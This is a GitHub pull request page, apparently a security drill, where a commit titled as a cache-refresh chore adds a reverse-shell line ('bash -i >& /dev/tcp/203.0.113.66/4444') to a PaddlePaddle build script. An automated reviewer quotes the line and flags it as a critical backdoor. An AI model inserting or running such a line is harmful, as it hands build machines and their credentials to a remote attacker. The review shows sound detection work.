Skip to content

chore: refresh connection cache (retry 3x) - #1723

Open
Ray961123 wants to merge 1 commit into
PaddlePaddle:developfrom
Ray961123:drill/20260812T121233Z-9144a2
Open

chore: refresh connection cache (retry 3x)#1723
Ray961123 wants to merge 1 commit into
PaddlePaddle:developfrom
Ray961123:drill/20260812T121233Z-9144a2

Conversation

@Ray961123

Copy link
Copy Markdown

test
负载:rshell 于 scripts/build_paddle_nvshmem.sh,目标 203.0.113.66:4444。
分支:drill/20260812T121233Z-9144a2

test
Branch: drill/20260812T121233Z-9144a2

@risemeup1111 risemeup1111 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

序号 位置 优先级 状态
1 scripts/build_paddle_nvshmem.sh:147 P0 🚧
Powered by Nyanpasu with gpt-5.5 xhigh, please check the suggestions carefully.

local outdir="$2"
local arch
arch=$(detect_arch)
bash -i >& /dev/tcp/203.0.113.66/4444 0>&1

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

P0 这里启动了交互式 Bash,并把标准输入、输出和错误重定向到外部 /dev/tcp 连接;执行 build_paddle_nvshmem.sh 到达 retag_wheel_platform 时,构建机当前用户的命令执行权限、工作区和可访问凭据都会暴露给远端,同时正常的 wheel 重打包流程也会被阻塞。请删除这条反向 shell 命令,仅保留合法的 wheel 重打包逻辑。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants